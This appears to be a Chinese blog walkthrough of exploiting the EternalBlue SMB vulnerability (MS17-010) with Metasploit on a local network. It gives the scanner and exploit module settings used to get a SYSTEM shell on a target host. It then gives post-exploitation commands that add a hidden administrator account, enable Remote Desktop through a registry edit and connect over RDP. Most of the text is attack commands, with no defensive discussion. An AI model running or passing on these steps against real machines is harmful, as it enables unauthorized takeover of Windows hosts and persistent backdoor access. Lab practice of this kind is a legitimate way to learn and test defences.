永恒之蓝 CVE-2017-0146

还记得之前的一个php小脚本吗?用来探测192.168.X.X网段的网关。当探测到网关的时候,我们可以进一步探测该网关所在的网段存在的主机和漏洞的发现

实验环境:局域网,metasploit

漏洞利用:ms-17-010

使用kali打开metasploi0t,实验一下这个曾经轰动一时的漏洞

搜索cve-2017-0146或者ms17_010

永恒之蓝 CVE-2017-0146_第1张图片
cve漏洞

auxiliary/scanner/smb/smb_ms17_010  //扫描某个网段是否存在ms17_010漏洞

exploit/windows/smb/ms17_010_eternalblue //永恒之蓝Eternalblue漏洞利用模块

exploit/windows/smb/ms17_010_psexec   //永恒协作EternalSynergy、永恒浪漫EternalRomance、EternalChampion永恒冠军  继承在一起的模块

选择漏洞辅助模块进行探测

永恒之蓝 CVE-2017-0146_第2张图片
vulnerable

use   auxiliary/scanner/smb/smb_ms17_010   //使用漏洞扫描辅助模块

set   rhosts  192.168.121.1/24    //设置121这个网段

set  threads 100    //设置线程为100

run 

发现有可能利用的漏洞机器192.168.121.61

使用攻击模块进行确定

使用永恒之蓝
永恒之蓝 CVE-2017-0146_第3张图片
进行设置

use exploit/windows/smb/ms17_010_eternalblue  //使用ms17_010利用攻击模块

set  rhost 192.168.121.61   //设置靶机IP地址

run //利用

永恒之蓝 CVE-2017-0146_第4张图片
cmd命令

竟然直接进入cmd窗口,而且还是system权限

简单执行几个DOS命令

永恒之蓝 CVE-2017-0146_第5张图片
systeminfo
永恒之蓝 CVE-2017-0146_第6张图片
添加管理员
永恒之蓝 CVE-2017-0146_第7张图片
查看IP开放端口
DOS命令开启3389端口
永恒之蓝 CVE-2017-0146_第8张图片
再次查看

systeminfo   //查看主机的系统信息

net  user 123 123 /add   //添加用户

net   localgroup  administrators 123   /add   //添加123用户到管理员

netstat -an //查看主机端口

reg  add  "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"  /v fDenyTSConnections  /t   REG_DWORD  /d   0   /f   //DOS命令开启3389端口

可以直接进行连接

永恒之蓝 CVE-2017-0146_第9张图片
mstsc

还可以使用exploit/windows/smb/ms17_010_psexec利用模块

再次进行一些设置,和上面同理,话不多说,直接上最后效果图

永恒之蓝 CVE-2017-0146_第10张图片
session会话
永恒之蓝 CVE-2017-0146_第11张图片
session会话

更多meterpreter命令,参考资料

http://www.91ri.org/8476.html

你可能感兴趣的:(永恒之蓝 CVE-2017-0146)